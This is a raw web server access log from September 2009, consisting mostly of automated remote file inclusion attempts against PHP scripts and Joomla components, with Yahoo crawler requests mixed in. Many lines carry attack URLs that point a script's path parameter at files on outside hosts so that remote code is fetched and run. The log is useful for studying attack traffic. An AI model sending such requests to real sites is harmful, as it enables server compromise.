61.252.26.98 - - [16/Sep/2009:09:23:00 -0700] "GET /logs/access_080716.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:23:00 -0700] "GET /logs/access_080314.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:01 -0700] "GET /logs/access_090102.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:03 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:09 -0700] "GET /logs/access_090413.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:15 -0700] "GET /logs/access_080616.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:24 -0700] "GET /logs/access_090124.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:26 -0700] "GET /logs/access_080115.log HTTP/1.0" 200 606378 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:29 -0700] "GET /logs/access_080621.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.69.41 - - [16/Sep/2009:09:23:30 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.fileden.com/files/2009/9/13/2573480/KTS.txt??? HTTP/1.1" 200 19942 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.69.41 - - [16/Sep/2009:09:23:31 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 200 19926 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.69.41 - - [16/Sep/2009:09:23:31 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 200 19926 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:23:34 -0700] "GET /logs/access_080623.log HTTP/1.0" 200 2251687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:23:56 -0700] "GET /vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:23:58 -0700] "GET /logs//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:24:01 -0700] "GET /logs/access_090314.log//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:24:04 -0700] "GET /logs//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:24:04 -0700] "GET /vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:24:04 -0700] "GET /logs/access_090314.log%20%20//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:24:13 -0700] "GET /logs/access_080413.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:31 -0700] "GET /logs//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:31 -0700] "GET /logs/access_090314.log%20%20//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:31 -0700] "GET /vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:35 -0700] "GET /logs//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:35 -0700] "GET /vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:36 -0700] "GET /logs/access_090314.log//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:47 -0700] "GET /vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:47 -0700] "GET /logs//vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:24:48 -0700] "GET /logs/access_090314.log%20%20//vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:25:10 -0700] "GET /logs/access_080712.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:25:34 -0700] "GET /logs/access_090517.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:25:42 -0700] "GET /logs/access_090226.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:25:46 -0700] "GET /vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:25:46 -0700] "GET /logs//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:25:46 -0700] "GET /logs/access_090314.log//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:26:00 -0700] "GET /logs/access_090316.log//ckshop.php?incdir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:26:00 -0700] "GET /logs/access_090303.log//ckshop.php?incdir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:26:00 -0700] "GET /logs/access_090303.log%20%20//ckshop.php?incdir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:26:00 -0700] "GET /ckshop.php?incdir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:26:00 -0700] "GET /logs//ckshop.php?incdir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:01 -0700] "GET /logs/access_090314.log//vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:01 -0700] "GET /logs//vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:01 -0700] "GET /vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:02 -0700] "GET /vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:02 -0700] "GET /logs//vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:03 -0700] "GET /logs/access_090314.log//vote_check.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:09 -0700] "GET /logs//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:09 -0700] "GET /vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:26:10 -0700] "GET /logs/access_090314.log//vote_check.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:26:10 -0700] "GET /logs/access_090316.log%20%20//ckshop.php?incdir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:16 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:16 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:16 -0700] "GET /logs/access_080502.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:18 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:18 -0700] "GET /logs/access_080502.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:18 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:21 -0700] "GET /logs/access_081109.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:26:23 -0700] "GET /logs/access_081109.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:26:23 -0700] "GET /logs/access_090620.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.15.230.189 - - [16/Sep/2009:09:26:26 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 21317 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:26:27 -0700] "GET /logs/access_071223.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.69.41 - - [16/Sep/2009:09:26:31 -0700] "GET /page.php?doc=http://www.fileden.com/files/2009/9/13/2573480/KTS.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:34 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:34 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:34 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:26:36 -0700] "GET /logs/access_081012.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:37 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:37 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:37 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:40 -0700] "GET /logs/access_081109.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:41 -0700] "GET /logs/access_081109.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:48 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:48 -0700] "GET /logs/access_080502.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:48 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:26:53 -0700] "GET /logs/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:26:53 -0700] "GET /include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:26:53 -0700] "GET /logs/access_090617.log%20%20/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:26:54 -0700] "GET /logs/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:26:54 -0700] "GET /include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:26:55 -0700] "GET /logs/access_090617.log%20%20/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:26:59 -0700] "GET /logs/access_081109.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:27:19 -0700] "GET /logs/access_090610.log%20%20/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:09:27:23 -0700] "GET /logs/access_090610.log%20%20/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:27:31 -0700] "GET /logs/access_080313.log//appserv/mani.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:28:19 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:28:19 -0700] "GET /logs/access_081109.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:28:19 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:09:28:19 -0700] "GET /logs/access_081109.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:09:28:32 -0700] "GET /logs/access_080104.log HTTP/1.0" 200 467398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:28:46 -0700] "GET /logs/senetman/html/index.php?page=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:28:46 -0700] "GET /logs/access_080416.log%20%20/senetman/html/index.php?page=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:28:46 -0700] "GET /senetman/html/index.php?page=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:28:55 -0700] "GET /skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:28:55 -0700] "GET /logs//skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:28:55 -0700] "GET /logs/access_090326.log//skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:28:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:28:59 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:28:59 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:29:00 -0700] "GET /logs/access_080304.log//newspublish/include.php?path[docroot]=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:29:00 -0700] "GET /newspublish/include.php?path[docroot]=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:29:06 -0700] "GET /skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:29:06 -0700] "GET /logs/access_090326.log//skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:29:06 -0700] "GET /logs//skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.138.115.131 - - [16/Sep/2009:09:29:09 -0700] "GET /logs/access_081109.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://NR.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:29:13 -0700] "GET /logs/access_080304.log//newspublish/include.php?path[docroot]=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:29:14 -0700] "GET /newspublish/include.php?path[docroot]=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:29:14 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:29:53 -0700] "GET /newspublish/include.php?path[docroot]=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:30:10 -0700] "GET /logs/access_090326.log%20%20//skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:09:30:15 -0700] "GET /logs/access_090326.log%20%20//skin/uks_board_v2010/write.php?dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:30:21 -0700] "GET /logs/access_080708.log/senetman/html/index.php?page=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:30:21 -0700] "GET /logs/access_080620.log/senetman/html/index.php?page=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:30:24 -0700] "GET /logs/access_080701.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:30:24 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:09:30:24 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:30:30 -0700] "GET /logs/access_080304.log///bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:30:30 -0700] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:30:30 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:30:30 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:30:30 -0700] "GET /logs/access_081109.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:09:30:35 -0700] "GET /logs/access_090801.log///bbs//skin/zero_vote/ask_password.php?dir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
